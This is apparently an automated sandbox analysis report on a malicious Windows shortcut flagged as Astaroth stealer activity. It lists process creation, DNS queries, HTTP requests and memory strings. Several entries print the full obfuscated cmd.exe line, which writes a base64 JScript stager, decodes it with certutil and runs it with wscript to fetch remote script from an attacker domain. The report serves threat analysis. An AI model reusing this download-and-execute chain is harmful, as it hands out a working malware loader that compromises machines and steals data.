Click to jump to signature section
Source: unknown | HTTPS traffic detected: 104.16.123.96:443 -> 192.168.2.4:49693 version: TLS 1.2 |
Source: C:\Windows\System32\wscript.exe | Domain query: a8eiy8.innovationsinsight.cyou | |
Source: C:\Windows\System32\wscript.exe | Domain query: www.cloudflare.com | |
Source: C:\Windows\System32\wscript.exe | Network Connect: 188.114.96.3 80 | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Network Connect: 104.16.123.96 443 | Jump to behavior |
Source: Traffic | Snort IDS: 2851288 ETPRO TROJAN Astaroth Stealer Activity (GET) 192.168.2.4:49692 -> 188.114.96.3:80 |
Source: global traffic | HTTP traffic detected: GET /cdn-cgi/error HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.cloudflare.com |
Source: global traffic | HTTP traffic detected: GET /?3/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: a8eiy8.innovationsinsight.cyouConnection: Keep-Alive |
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS |
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19 |
Source: Joe Sandbox View | IP Address: 188.114.96.3 188.114.96.3 |
Source: Joe Sandbox View | IP Address: 188.114.96.3 188.114.96.3 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49693 |
Source: unknown | Network traffic detected: HTTP traffic on port 49693 -> 443 |
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 01 Feb 2023 06:21:01 GMTTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: MISSSet-Cookie: __cf_bm=NctGf338qS6Q8cshuHpQF7uH_MOJuTny5ADo4vU.xqk-1675232461-0-AW1Q7h5OMBuCvlggYK/BHKQyYSg3tgfvIRV9fHORHnQWMveDPLyaOdJTr2ypAAtGC4AQ5arCEIABAKODWktmY4Z2CurBlCA7OX1h8Nee2olT; path=/; expires=Wed, 01-Feb-23 06:51:01 GMT; domain=.www.cloudflare.com; HttpOnly; Secure; SameSite=NoneServer-Timing: cf-q-config;dur=4.9999998736894e-06Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uv4Cu%2FH5ZRDqWs91VT3dCsC%2BGWzlthG4vMasGJWkt%2FsaHORTre%2BFtRjecD8DDQyi73ORgxl9At0bvivDoskcD6jynlgVCR8YlFvxCZXi6MR5WVHS423b2XGhqKRGnmUdjuCtYQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: __cflb=02DiuJFZNR1vT983reJ7ooDAdV9yu7NGnj5V9pFxnTHRN; SameSite=None; Secure; path=/; expires=Thu, 02-Feb-23 05:21:01 GMT; HttpOnlyServer: cloudflareCF-RAY: 792895a4c8f030db-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 |
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: hTtP://a8eiy8.innovationsinsight.cyou/?3/ |
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: hTtP://a8eiy8.innovationsinsight.cyou/?3/l |
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://a8eiy8.innovationsinsight.cyou/ |
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://a8eiy8.innovationsinsight.cyou/?3/ |
Source: wscript.exe, 00000003.00000003.304983950.000001D5B8D2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311600820.000001D5B8D2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.310925472.000001D5B8D2A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com |
Source: wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/ |
Source: wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/cdn-cgi/error |
Source: wscript.exe, 00000003.00000003.304983950.000001D5B8D2A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/cdn-cgi/errorT |
Source: wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/cdn-cgi/errore.com/ |
Source: wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/cdn-cgi/errorfM |
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.305025241.000001D5B8CE5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.cloudflare.com/g |
Source: unknown | DNS traffic detected: queries for: a8eiy8.innovationsinsight.cyou |
Source: global traffic | HTTP traffic detected: GET /cdn-cgi/error HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Connection: Keep-AliveHost: www.cloudflare.com |
Source: global traffic | HTTP traffic detected: GET /?3/ HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: a8eiy8.innovationsinsight.cyouConnection: Keep-Alive |
Source: unknown | HTTPS traffic detected: 104.16.123.96:443 -> 192.168.2.4:49693 version: TLS 1.2 |
Source: C:\Windows\System32\certutil.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers | Jump to behavior |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C:\YDgC5P9\>nul 2>&1 &&s^eT XEHH=C:\YDgC5P9\^YDgC5P9.^jS&&echo dmFyIEM0NXQ9InNjIisiciI7RDQ1dD0iaXAiKyJ0OmgiO0U0NXQ9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDNDV0K0Q0NXQrRTQ1dCsiLy9hOGVpeTguaW5ub3ZhdGlvbnNpbnNpZ2h0LmN5b3UvPzMvIik7>!XEHH!&&cErtUtil -f -dEco^de !XEHH! !XEHH!&&ca^ll !XEHH! | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\YDgC5P9\YDgC5P9.jS C:\YDgC5P9\YDgC5P9.jS | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\YDgC5P9\YDgC5P9.jS" | |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\YDgC5P9\YDgC5P9.jS C:\YDgC5P9\YDgC5P9.jS | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\YDgC5P9\YDgC5P9.jS" | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 | Jump to behavior |
Source: classification engine | Classification label: mal68.evad.winLNK@6/1@2/2 |
Source: C:\Windows\System32\cmd.exe | File read: C:\Users\user\Desktop\desktop.ini | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | File read: C:\Windows\System32\drivers\etc\hosts | Jump to behavior |
Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /V/D/c md C:\YDgC5P9\>nul 2>&1 &&s^eT XEHH=C:\YDgC5P9\^YDgC5P9.^jS&&echo dmFyIEM0NXQ9InNjIisiciI7RDQ1dD0iaXAiKyJ0OmgiO0U0NXQ9IlQiKyJ0UCIrIjoiO0dldE9iamVjdChDNDV0K0Q0NXQrRTQ1dCsiLy9hOGVpeTguaW5ub3ZhdGlvbnNpbnNpZ2h0LmN5b3UvPzMvIik7>!XEHH!&&cErtUtil -f -dEco^de !XEHH! !XEHH!&&ca^ll !XEHH! |
Source: LNK file | Process created: C:\Windows\System32\cmd.exe |
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer | Jump to behavior |
Source: wscript.exe, 00000003.00000003.310977085.000001D5B8C9A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.310977085.000001D5B8D11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.305025241.000001D5B8D11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8C9B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.311534679.000001D5B8D11000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW |
Source: C:\Windows\System32\wscript.exe | Domain query: a8eiy8.innovationsinsight.cyou | |
Source: C:\Windows\System32\wscript.exe | Domain query: www.cloudflare.com | |
Source: C:\Windows\System32\wscript.exe | Network Connect: 188.114.96.3 80 | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Network Connect: 104.16.123.96 443 | Jump to behavior |
Source: unknown | Process created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /v/d/c md c:\ydgc5p9\>nul 2>&1 &&s^et xehh=c:\ydgc5p9\^ydgc5p9.^js&&echo dmfyiem0nxq9innjiisicii7rdq1dd0iaxaikyj0omgio0u0nxq9ilqikyj0ucirijoio0dlde9iamvjdchdndv0k0q0nxqrrtq1dcsily9hogvpetguaw5ub3zhdglvbnnpbnnpz2h0lmn5b3uvpzmviik7>!xehh!&&certutil -f -deco^de !xehh! !xehh!&&ca^ll !xehh! |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\certutil.exe cErtUtil -f -dEcode C:\YDgC5P9\YDgC5P9.jS C:\YDgC5P9\YDgC5P9.jS | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\YDgC5P9\YDgC5P9.jS" | Jump to behavior |
Source: C:\Windows\System32\cmd.exe | Queries volume information: C:\ VolumeInformation | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid | Jump to behavior |